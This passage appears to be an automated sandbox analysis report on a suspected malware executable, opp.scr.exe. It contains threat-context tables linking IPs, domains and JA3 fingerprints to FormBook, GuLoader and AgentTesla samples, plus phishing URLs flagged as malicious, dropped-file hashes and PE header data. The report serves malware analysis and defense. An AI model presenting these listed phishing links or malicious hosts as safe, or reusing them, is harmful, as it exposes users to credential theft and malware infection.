                                        • Execution Graph export aborted for target oOOsxwAhjIw.exe, PID 6716 because it is empty
                                        • Not all processes where analyzed, report is missing behavior information
                                        • Report creation exceeded maximum time and may have missing disassembly code information.
                                        • Report size exceeded maximum capacity and may have missing disassembly code.

                                        Simulations

                                        Behavior and APIs

                                        No simulations

                                        Joe Sandbox View / Context

                                        IPs

                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        239.255.255.250KhbShPK91I.exeGet hashmaliciousUnknownBrowse
                                          https://www.canva.com/design/DAGD43Y65A0/6HVu_63FhXXJvEzUrBVTOA/view?utm_content=DAGD43Y65A0&utm_campaign=designshare&utm_medium=link&utm_source=editorGet hashmaliciousUnknownBrowse
                                            https://flow.page/efraudprevention.comGet hashmaliciousHTMLPhisherBrowse
                                              RFQ-LOTUS 2024.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                KpiLt01Slj.exeGet hashmaliciousUnknownBrowse
                                                  https://bafybeigjxmg3ulqmytt642sjwzluuvy7s2m2z4xbd4pqokaid5z3upavoi.ipfs.cf-ipfs.com/#mavaz@emfa.ptGet hashmaliciousHTMLPhisherBrowse
                                                    https://sharepoint.3cx-systems.co.uk/saga/recap.htmlGet hashmaliciousHTMLPhisherBrowse
                                                      4yFaZU8fhT.exeGet hashmaliciousRisePro StealerBrowse
                                                        undelivered Messages - Copie.htmGet hashmaliciousHTMLPhisherBrowse
                                                          http://event.strategiedirect.comGet hashmaliciousUnknownBrowse
                                                            66.96.161.166f4CdNDrJp8.exeGet hashmaliciousFormBookBrowse
                                                            • www.terelprime.com/gnbc/

                                                            Domains

                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            www.terelprime.comMOQ010524Purchase order.docGet hashmaliciousFormBookBrowse
                                                            • 66.96.161.166
                                                            SalinaGroup.docGet hashmaliciousFormBookBrowse
                                                            • 66.96.161.166
                                                            op.scr.exeGet hashmaliciousFormBookBrowse
                                                            • 66.96.161.166
                                                            NEW-ORDER_pdf.exeGet hashmaliciousFormBookBrowse
                                                            • 66.96.161.166
                                                            alhadani Aprilorders140424.scr.exeGet hashmaliciousFormBookBrowse
                                                            • 66.96.161.166
                                                            f4CdNDrJp8.exeGet hashmaliciousFormBookBrowse
                                                            • 66.96.161.166
                                                            AWB5889829680.scr.exeGet hashmaliciousFormBookBrowse
                                                            • 66.96.161.166
                                                            awb_shipping_documents_26_03_2024_000000000.vbsGet hashmaliciousFormBook, GuLoader, RemcosBrowse
                                                            • 66.96.161.166

                                                            ASNs

                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            BIZLAND-SDUSMOQ010524Purchase order.docGet hashmaliciousFormBookBrowse
                                                            • 66.96.161.166
                                                            SalinaGroup.docGet hashmaliciousFormBookBrowse
                                                            • 66.96.161.166
                                                            Suppose36OUT.batGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                            • 66.96.147.105
                                                            op.scr.exeGet hashmaliciousFormBookBrowse
                                                            • 66.96.161.166
                                                            SecuriteInfo.com.Exploit.ShellCode.69.20357.30006.rtfGet hashmaliciousFormBook, PureLog StealerBrowse
                                                            • 66.96.162.142
                                                            25042024 - HSBC Payment SWIFT COPY PAGES.htaGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                            • 66.96.147.105
                                                            SOA.pdf.exeGet hashmaliciousFormBookBrowse
                                                            • 66.96.162.129
                                                            PO_PDF24172024.scr.exeGet hashmaliciousFormBookBrowse
                                                            • 66.96.162.136
                                                            100% #U4e8b#U524d#U306e#U8fc5#U901f#U306a#U53d6#U5f15.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 66.96.131.81
                                                            UuD1zt2QpK.elfGet hashmaliciousMiraiBrowse
                                                            • 72.22.85.158

                                                            JA3 Fingerprints

                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            1138de370e523e824bbca92d049a3777KhbShPK91I.exeGet hashmaliciousUnknownBrowse
                                                            • 23.1.237.91
                                                            MejqsB9tx9.exeGet hashmaliciousAmadeyBrowse
                                                            • 23.1.237.91
                                                            OUZXNOqKXg.exeGet hashmaliciousRisePro StealerBrowse
                                                            • 23.1.237.91
                                                            wmiclnt.dllGet hashmaliciousUnknownBrowse
                                                            • 23.1.237.91
                                                            http://crowninter.com/Request_for_Quote.exeGet hashmaliciousUnknownBrowse
                                                            • 23.1.237.91
                                                            Dissolvability.exeGet hashmaliciousGuLoaderBrowse
                                                            • 23.1.237.91
                                                            D6OzFk32fU9xCHV.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                            • 23.1.237.91
                                                            PO_287104.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                            • 23.1.237.91
                                                            Transferencia.exeGet hashmaliciousDarkCloud, DarkTortillaBrowse
                                                            • 23.1.237.91
                                                            wsst63fXULoBQTw.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                            • 23.1.237.91
                                                            28a2c9bd18a11de089ef85a160da29e4KhbShPK91I.exeGet hashmaliciousUnknownBrowse
                                                            • 104.118.8.139
                                                            • 52.165.165.26
                                                            • 20.12.23.50
                                                            https://www.canva.com/design/DAGD43Y65A0/6HVu_63FhXXJvEzUrBVTOA/view?utm_content=DAGD43Y65A0&utm_campaign=designshare&utm_medium=link&utm_source=editorGet hashmaliciousUnknownBrowse
                                                            • 104.118.8.139
                                                            • 52.165.165.26
                                                            • 20.12.23.50
                                                            https://flow.page/efraudprevention.comGet hashmaliciousHTMLPhisherBrowse
                                                            • 104.118.8.139
                                                            • 52.165.165.26
                                                            • 20.12.23.50
                                                            RFQ-LOTUS 2024.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                            • 104.118.8.139
                                                            • 52.165.165.26
                                                            • 20.12.23.50
                                                            KpiLt01Slj.exeGet hashmaliciousUnknownBrowse
                                                            • 104.118.8.139
                                                            • 52.165.165.26
                                                            • 20.12.23.50
                                                            https://bafybeigjxmg3ulqmytt642sjwzluuvy7s2m2z4xbd4pqokaid5z3upavoi.ipfs.cf-ipfs.com/#mavaz@emfa.ptGet hashmaliciousHTMLPhisherBrowse
                                                            • 104.118.8.139
                                                            • 52.165.165.26
                                                            • 20.12.23.50
                                                            4yFaZU8fhT.exeGet hashmaliciousRisePro StealerBrowse
                                                            • 104.118.8.139
                                                            • 52.165.165.26
                                                            • 20.12.23.50
                                                            undelivered Messages - Copie.htmGet hashmaliciousHTMLPhisherBrowse
                                                            • 104.118.8.139
                                                            • 52.165.165.26
                                                            • 20.12.23.50
                                                            http://event.strategiedirect.comGet hashmaliciousUnknownBrowse
                                                            • 104.118.8.139
                                                            • 52.165.165.26
                                                            • 20.12.23.50
                                                            8DMUHFukm8.exeGet hashmaliciousUnknownBrowse
                                                            • 104.118.8.139
                                                            • 52.165.165.26
                                                            • 20.12.23.50

                                                            Dropped Files

                                                            No context

                                                            Created / dropped Files

                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\opp.scr.exe.log

                                                            Download File
                                                            Process:C:\Users\user\Desktop\opp.scr.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):706
                                                            Entropy (8bit):5.349842958726647
                                                            Encrypted:false
                                                            SSDEEP:12:Q3La/hhkvoDLI4MWuCqDLI4MWuPTAq1KDLI4M9XKbbDLI4MWuPJKAVKhat92n4M6:MLUE4K5E4KH1qE4qXKDE4KhKiKhg84j
                                                            MD5:9BA266AD16952A9A57C3693E0BCFED48
                                                            SHA1:5DB70A3A7F1DB4E3879265AB336B2FA1AFBCECD5
                                                            SHA-256:A6DFD14E82D7D47195A1EC7F31E64C2820AB8721EF4B5825E21E742093B55C0E
                                                            SHA-512:678E1F639379FC24919B7CF562FA19CE53363CBD4B0EAB66486F6F8D5DD5958DE3AAE8D7842EE868EFCC39D907FDC1A3ACF464E29D37B0DAEE9874C39730FE8E
                                                            Malicious:false
                                                            Reputation:moderate, very likely benign file
                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..

                                                            C:\Users\user\AppData\Local\Temp\13d6pS3

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\dfrgui.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                            Category:dropped
                                                            Size (bytes):196608
                                                            Entropy (8bit):1.121297215059106
                                                            Encrypted:false
                                                            SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                            MD5:D87270D0039ED3A5A72E7082EA71E305
                                                            SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                            SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                            SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                            Malicious:false
                                                            Reputation:high, very likely benign file
                                                            Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

                                                            Download File
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu May 2 12:56:21 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                            Category:dropped
                                                            Size (bytes):2677
                                                            Entropy (8bit):3.9653381544603166
                                                            Encrypted:false
                                                            SSDEEP:48:8+dVT995HNidAKZdA19ehwiZUklqehGy+3:8gDtdy
                                                            MD5:520A5B2AF0BA754BCBC8C09F9CA06D23
                                                            SHA1:93200A90288B596EB23242D5B72FD3E653C4E167
                                                            SHA-256:0414DA1FD7D7E97B792F239E6D97FE10BBEF2603A2C020B80EB5E73124652275
                                                            SHA-512:D7D3D61820728A2FE62833305B600CC5CB287AFD3968C9FEF56D209789CF9A26A4F024AC0F7E42B548CFE54F1810CEFC68DAF42974A579A0006302221AD913D8
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:L..................F.@.. ...$+.,....:zA.....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.X.o....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X.o....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X.o....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X.o..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.X.o...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............g.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

                                                            Download File
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu May 2 12:56:21 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                            Category:dropped
                                                            Size (bytes):2679
                                                            Entropy (8bit):3.980784329235172
                                                            Encrypted:false
                                                            SSDEEP:48:8RdVT995HNidAKZdA1weh/iZUkAQkqehNy+2:8RDH9QQy
                                                            MD5:4BD3BE94E3A730A1BB8F6C2DBAE9997A
                                                            SHA1:00D24A7ABC315B757009E2AE7D3BCB59A45B2067
                                                            SHA-256:4B7710505A0656678A93416504EF7AEFDBDC3AB790DBA9E90374601F38ADB0FF
                                                            SHA-512:76A5CD6877269DA6654F58ADE27482830972F7FB8E6A1DBCB79A7C65D288C76A3C44D1FBB498413CC5FE73F3DE1FF8CB006862A3B2A098963F81B6CA7EE1F6AA
                                                            Malicious:false
                                                            Preview:L..................F.@.. ...$+.,....{f5.....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.X.o....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X.o....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X.o....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X.o..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.X.o...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............g.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

                                                            Download File
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 4 12:54:07 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                            Category:dropped
                                                            Size (bytes):2693
                                                            Entropy (8bit):3.9934567497376294
                                                            Encrypted:false
                                                            SSDEEP:48:8xudVT99sHNidAKZdA14tseh7sFiZUkmgqeh7sHy+BX:8xwDsnxy
                                                            MD5:7DE487D59ECBF02FA6667B27F8851603
                                                            SHA1:D171ABBEC5293B3690D65E656DF1AC0DF5D14EFC
                                                            SHA-256:7F17F2B81287CBBC63C21B012350F27A80E4DD3CB5FBF264C7C4AF3D51EFFBB9
                                                            SHA-512:27FA7EB7D4D0840D60CAA86DD5B4DD9C22090E67280192C84F7B78D43580467393AAD906B6DAF4729EF1E5BF7EF79EDEF39C87AEF9A8FD5134789159943D555F
                                                            Malicious:false
                                                            Preview:L..................F.@.. ...$+.,......e>....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.X.o....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X.o....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X.o....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X.o..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VDW.n...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............g.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk

                                                            Download File
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu May 2 12:56:21 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                            Category:dropped
                                                            Size (bytes):2681
                                                            Entropy (8bit):3.980448391893944
                                                            Encrypted:false
                                                            SSDEEP:48:8IdVT995HNidAKZdA1vehDiZUkwqehJy+R:8KDkfy
                                                            MD5:6A0782E7F22C3AD844E67E32DB0A5093
                                                            SHA1:8DD373C5685CD661013EE696A99654E7119B84D7
                                                            SHA-256:5338212521A26A145427CE4FB28FF4B48FFC9BE51929C1935AE6C349D42E6274
                                                            SHA-512:94EF33E1AA6119F96B81FC1DCAC1D9B58EF9169BDA911AF4565CD4FEC3A0F73D3C5DDA0DFE47C9B8806F36B7A34A9801A230F0BDA12D95E11147AD795BF2ED52
                                                            Malicious:false
                                                            Preview:L..................F.@.. ...$+.,......-.....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.X.o....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X.o....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X.o....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X.o..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.X.o...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............g.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk

                                                            Download File
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu May 2 12:56:21 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                            Category:dropped
                                                            Size (bytes):2681
                                                            Entropy (8bit):3.9689440402781258
                                                            Encrypted:false
                                                            SSDEEP:48:8DpdVT995HNidAKZdA1hehBiZUk1W1qehLy+C:8NDk9ry
                                                            MD5:D96C27BED20D78966489CC548B5F1127
                                                            SHA1:E03AA690934DCED67AA5B3B2643BBD97E2AC5BF3
                                                            SHA-256:32447842992D92274242C9B89FF76FDE1E73E6A649B2A22BCA776B9E8F788897
                                                            SHA-512:934E6C5E34167E78613A091ADE05C2ECB8B5027C4B0C71E2E215E85EEB78CC511EA8747CB2B3AA212EEAA8897B5483230CC04CB700EE33994191397084D9329C
                                                            Malicious:false
                                                            Preview:L..................F.@.. ...$+.,......;.....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.X.o....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X.o....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X.o....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X.o..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.X.o...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............g.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk

                                                            Download File
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu May 2 12:56:21 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                            Category:dropped
                                                            Size (bytes):2683
                                                            Entropy (8bit):3.9790831051390674
                                                            Encrypted:false
                                                            SSDEEP:48:8fdVT995HNidAKZdA1duT+ehOuTbbiZUk5OjqehOuTbxy+yT+:8nDKT/TbxWOvTbxy7T
                                                            MD5:996C58F8D6E7CE3A22E2973D8C3338AD
                                                            SHA1:AB49C3E756754F8C621D701199690C5DDBA88CB9
                                                            SHA-256:2E85286C8AEE243573397E0E71C3F8A0C5CFDA3892748D2E3A6EB9BC41996D06
                                                            SHA-512:72F5CE71EF9D5226081D24D964A15325DF4DFA13223FF7664BB26E3FF1B226F6A319F9FD2AA539A806E71396AD799C71956C5A2837B2E3BF563CDA9BF947EE8F
                                                            Malicious:false
                                                            Preview:L..................F.@.. ...$+.,.....d%.....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.X.o....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X.o....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X.o....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X.o..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.X.o...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............g.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                            Chrome Cache Entry: 71

                                                            Download File
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (5435)
                                                            Category:downloaded
                                                            Size (bytes):5440
                                                            Entropy (8bit):5.817870210526053
                                                            Encrypted:false
                                                            SSDEEP:96:8/rliAEBCsx96qNH3cgjWWFeKRZqMTwCuwTx/glsoo8XMX6RZW2qQffffo:QB1EtxvH3cgj5FZwCnTx/glotyW2k
                                                            MD5:F55837BBB7A3233133F92A7BFB51C2CD
                                                            SHA1:83CFB2F182CE0D4B9B44B6A481C3E9C8B9719D2F
                                                            SHA-256:D2CA6C431902BD3BF675FCBEE711FF9F5A142B1360912BF6C5611DD4039B4D36
                                                            SHA-512:BAF452FE7D8418B17F52F35595981FE5D5E26A465321855D464832BB55212624485D1D0F509967BE33BA4D299998B58307FE6D2D5C63387D97842B17ED96A67A
                                                            Malicious:false
                                                            URL:https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
                                                            Preview:)]}'.["",["dow jones stocks","nba boston celtics","nyt crossword clues","united methodist church","ps plus may 2024 monthly games","san jacinto river flooding","bitcoin cryptocurrency","kentucky basketball transfer portal"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","google:suggestdetail":[{"zl":10002},{"google:entityinfo":"CggvbS8wYndqahIiQm9zdG9uIENlbHRpY3Mg4oCUIEJhc2tldGJhbGwgdGVhbTKKGmRhdGE6aW1hZ2UvcG5nO2Jhc2U2NCxpVkJPUncwS0dnb0FBQUFOU1VoRVVnQUFBRG9BQUFCQUNBTUFBQUI4M0pTOUFBQUJtRkJNVkVYLy8vOEFBQUFBZ2tpbU56SUFoVW9BZURTcE9ETUFpRXNBZjBQazVPU3NPVFN5c3JLV2xwYi91WWNBZmtBQWdrUUFlenJEdzhPcnE2dVZNUzJrcEtUdjcrLzdzNFBMeHNrQU5nQUFlQy9hMnRyT3pzNjh2THpiNk9BQUZRQnVKU0d1TXpJQWREdHlBQUNVazFJQVhSK2tkVlpSbW5Gd2dIZlJsbTB4alZ1VWFrM25wWGtBTHdCNWVYbkw0ZFFBSHdDWXY2aDlzSkszMGNHcXliYkNtVlVBYXk1c3A0V1JqSTk2a0ZBQVVoaGxaV1VuSnllcGxwV1RiR3R5WEZ1ZWVuaDlWbFdWRWdXbUtTSitBQUJXVmxaMUhCaGZIeDJMZDNaRFFVSkJQeDRBRFFCRE1UQUFRU

                                                            Static File Info

                                                            General

                                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Entropy (8bit):7.68561352975804
                                                            TrID:
                                                            • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                            • Win32 Executable (generic) a (10002005/4) 49.97%
                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                            • DOS Executable Generic (2002/1) 0.01%
                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                            File name:opp.scr.exe
                                                            File size:563'200 bytes
                                                            MD5:f7c26f0b2088e0324b019c534686b257
                                                            SHA1:98d314090e6c74cd6afc5d2fde7e4dd77d1fe240
                                                            SHA256:8ec69eaf10a3043817f153a9ac99d113884d1fe657709b759512b688c5014b8f
                                                            SHA512:a533d146714c5c02be66704a21e7afd38537a4991053463bfef7964cb1b087515e364f935910af3873fa135eb3de4a0d483cc85eb973bba2f2d0be769137e4f4
                                                            SSDEEP:12288:DiMz0++0Zwb7eoBPuyTWhxmzd4ZcUF8L5:RA++0ZwnZTAZcUOL5
                                                            TLSH:58C4E184BBDC1682F0FE163728B414189F72B09F4571DA4E496A71AF25FEF418922F27
                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...t.................0.................. ........@.. ....................................@................................

                                                            File Icon

                                                            Icon Hash:00928e8e8686b000

                                                            Static PE Info

                                                            General

                                                            Entrypoint:0x48abde
                                                            Entrypoint Section:.text
                                                            Digitally signed:false
                                                            Imagebase:0x400000
                                                            Subsystem:windows gui
                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                            Time Stamp:0xEDF99A74 [Sun Jul 8 03:56:36 2096 UTC]
                                                            TLS Callbacks:
                                                            CLR (.Net) Version:
                                                            OS Version Major:4
                                                            OS Version Minor:0
                                                            File Version Major:4
                                                            File Version Minor:0
                                                            Subsystem Version Major:4
                                                            Subsystem Version Minor:0
                                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                            Entrypoint Preview

                                                            Instruction
                                                            jmp dword ptr [00402000h]
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
